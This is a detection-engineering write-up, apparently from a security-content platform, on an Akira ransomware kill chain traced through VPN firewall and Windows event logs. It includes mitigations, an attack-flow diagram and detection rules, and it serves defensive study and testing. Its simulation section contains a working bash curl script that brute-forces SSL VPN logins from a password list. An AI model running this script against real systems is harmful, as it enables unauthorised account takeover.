Tracing an Akira Ransomware Kill Chain Through Perimeter and Endpoint Logs
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article describes a recent intrusion linked to the Akira ransomware operation. The attackers obtained initial access by brute-forcing a disabled local SSL VPN account, then moved on to credential discovery, Kerberoasting, and lateral movement over RDP. Before launching encryption, they cleared logs and removed shadow copies. Notably, the entire sequence was visible through firewall syslog data and Windows EVTX logs, without relying on endpoint detection tooling. The report highlights how combining perimeter and endpoint telemetry can expose ransomware activity in its early stages.
Investigation
The investigation relied exclusively on SSL VPN firewall logs and Windows event log exports gathered from domain controllers and member servers. Event IDs including 4624, 4688, 4769, 1102, and 7036 were correlated to reconstruct the complete kill chain from initial access through final impact. The observed techniques included credential stuffing, domain discovery, Kerberoasting, RDP authentication, log clearing, and shadow copy deletion. No memory images or EDR telemetry were needed to map the intrusion.
Mitigation
The report recommends tightening remote access security, enforcing MFA, removing disabled accounts from firewall access lists, and strengthening authentication lockout policies. It also advises enabling detailed process auditing with Event ID 4688 across all systems, increasing security log retention, and forwarding critical logs to external storage. Detection content should specifically cover RC4-based Kerberos tickets, vssadmin shadow copy deletion, and unexpected PowerShell commands using -EncodedCommand. Consistent time synchronization across infrastructure is also essential for reliable correlation.
Response
When any of the identified indicators appear, responders should immediately isolate the compromised VPN account and quarantine affected systems. Relevant firewall and EVTX logs should be preserved, credentials reset, compromised accounts disabled, and shadow copies restored from clean backups where available. A full forensic review should then be performed to identify any additional persistence or follow-on activity, while ransomware response procedures are activated. Stakeholders should be informed promptly, and public disclosure should be considered where required.
"graph TB %% Class definitions classDef phase fill:#ffcc99 classDef tool fill:#c2f0c2 %% Node definitions phase_initial_access["<b>Phase</b> – Initial Access<br/><b>Technique</b> – T1133 External Remote Services<br/><b>Description</b>: Credential stuffing against SSL VPN using compromised local account."] class phase_initial_access phase tech_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/><b>Description</b>: Use of stolen credentials to log into the VPN."] class tech_valid_accounts phase phase_discovery["<b>Phase</b> – Discovery<br/><b>Technique</b> – T1482 Domain Trust Discovery<br/><b>Description</b>: Enumerate domain trusts using nltest."] class phase_discovery phase tech_account_discovery["<b>Technique</b> – T1087 Account Discovery<br/><b>Description</b>: Enumerate groups and users via net.exe and whoami."] class tech_account_discovery phase phase_credential_access["<b>Phase</b> – Credential Access<br/><b>Technique</b> – T1558.003 Kerberoasting<br/><b>Description</b>: Request RC4 service tickets to crack service account passwords."] class phase_credential_access phase phase_lateral_movement["<b>Phase</b> – Lateral Movement<br/><b>Technique</b> – T1021.001 Remote Services Remote Desktop Protocol<br/><b>Description</b>: Use RDP to move laterally to servers and domain controllers."] class phase_lateral_movement phase phase_persistence["<b>Phase</b> – Persistence and Privilege Escalation<br/><b>Technique</b> – T1136 Create Account<br/><b>Description</b>: Create a new service account in a nonu2011default OU and add it to privileged groups."] class phase_persistence phase phase_execution["<b>Phase</b> – Execution<br/><b>Technique</b> – T1059.001 PowerShell<br/><b>Description</b>: Run PowerShell scripts with -EncodedCommand.<br/><b>Technique</b> – T1059.003 Windows Command Shell<br/><b>Description</b>: Use cmd.exe for various commands."] class phase_execution phase phase_defense_evasion["<b>Phase</b> – Defense Evasion<br/><b>Technique</b> – T1070.001 Clear Windows Event Logs<br/><b>Description</b>: Clear Windows event logs.<br/><b>Technique</b> – T1562 Impair Defenses<br/><b>Description</b>: Stop security services using sc.exe or net stop."] class phase_defense_evasion phase phase_impact["<b>Phase</b> – Impact<br/><b>Technique</b> – T1490 Inhibit System Recovery<br/><b>Description</b>: Delete shadow copies with vssadmin.<br/><b>Technique</b> – T1565.001 Stored Data Manipulation<br/><b>Description</b>: Encrypt files on disk."] class phase_impact phase tool_ssl_vpn["<b>Tool</b> – SSL VPN client"] class tool_ssl_vpn tool tool_nltest["<b>Tool</b> – nltest utility"] class tool_nltest tool tool_net["<b>Tool</b> – net.exe utility"] class tool_net tool tool_whoami["<b>Tool</b> – whoami command"] class tool_whoami tool tool_powershell["<b>Tool</b> – PowerShell"] class tool_powershell tool tool_cmd["<b>Tool</b> – cmd.exe"] class tool_cmd tool tool_sc["<b>Tool</b> – sc.exe command"] class tool_sc tool tool_vssadmin["<b>Tool</b> – vssadmin utility"] class tool_vssadmin tool %% Connections showing flow phase_initial_access –>|leads to| tech_valid_accounts tech_valid_accounts –>|leads to| phase_discovery phase_discovery –>|leads to| tech_account_discovery tech_account_discovery –>|leads to| phase_credential_access phase_credential_access –>|leads to| phase_lateral_movement phase_lateral_movement –>|leads to| phase_persistence phase_persistence –>|leads to| phase_execution phase_execution –>|leads to| phase_defense_evasion phase_defense_evasion –>|leads to| phase_impact %% Tool usage edges phase_initial_access –>|uses| tool_ssl_vpn phase_discovery –>|uses| tool_nltest phase_discovery –>|uses| tool_net phase_discovery –>|uses| tool_whoami phase_execution –>|uses| tool_powershell phase_execution –>|uses| tool_cmd phase_defense_evasion –>|uses| tool_sc phase_impact –>|uses| tool_vssadmin "
Attack Flow
Detections
Possible Admin Account or Group Enumeration (via cmdline)
View
Possible Account or Group Enumeration / Manipulation (via cmdline)
View
Suspicious Domain Trusts Discovery (via cmdline)
View
Suspicious VSSADMIN Activity (via cmdline)
View
Detection of RDP-Based Lateral Movement and Domain-Level Privilege Escalation [Microsoft Windows Security Event Log]
View
Detection of SSLVPN Brute Force and Credential Stuffing [Firewall]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Reconnaissance (T1087): The attacker enumerates usernames from a compromised internal system and builds a credential‑stuffing list (e.g.,
users.txt). - Brute‑Force Loop (T1021.001 / T1078.001): Using a compromised external IP range belonging to a known hosting provider (e.g.,
203.0.113.45), the attacker launches a rapid series of failed SSLVPN authentication attempts (≥ 50) within one hour. Each attempt uses a different password from the list, targeting a single victim account. - Successful Credential Stuffing: After exhausting the list, a correct password is found; the attacker logs in successfully from the same IP, satisfying the “successful_auth” clause.
- Evasion (Optional – T1070.001): The attacker clears the Security log on the VPN appliance after the successful login to hide traces (not covered by this rule).
- Reconnaissance (T1087): The attacker enumerates usernames from a compromised internal system and builds a credential‑stuffing list (e.g.,
-
Regression Test Script: Bash script leveraging
curl(works on Linux attacker box). Adjust variables for real environment.#!/usr/bin/env bash # ------------------------------------------------------------------ # Simulate SSLVPN brute‑force / credential stuffing to trigger Sigma rule # ------------------------------------------------------------------ VPN_ENDPOINT="https://vpn.example.com/remote/auth" USERNAME="victim_user" PASSWORD_LIST="passwords.txt" # one password per line SOURCE_IP="203.0.113.45" # must be routable to the VPN # Function to perform a single login attempt attempt_login() { local pwd="$1" # Using --silent to avoid clutter; --write-out to capture HTTP code curl --silent --output /dev/null --write-out "%{http_code}" --user "$USERNAME:$pwd" "$VPN_ENDPOINT" } # 1. Generate 55 failed attempts (rate ~1/sec) echo "Starting failed attempts..." count=0 while IFS= read -r pwd && [ $count -lt 55 ]; do http_code=$(attempt_login "$pwd") echo "Attempt $((count+1)): HTTP $http_code (expected 401)" ((count++)) sleep 1 # keep within 1‑hour window done < "$PASSWORD_LIST" # 2. Successful login with correct password (assume last line in file) echo "Performing successful login..." correct_pwd=$(tail -n1 "$PASSWORD_LIST") http_code=$(attempt_login "$correct_pwd") echo "Successful attempt: HTTP $http_code (expected 200)" echo "Simulation complete." -
Cleanup Commands: Remove any temporary files and reset firewall rate‑limiting (if altered).
#!/usr/bin/env bash # Cleanup after SSLVPN brute‑force simulation # Delete the temporary password list if it was created on‑the‑fly if [ -f passwords.txt ]; then shred -u passwords.txt echo "Deleted passwords.txt" fi # Optionally, reset any temporary iptables rules used for testing sudo iptables -D INPUT -s 203.0.113.45 -j DROP 2>/dev/null || true echo "Cleanup finished."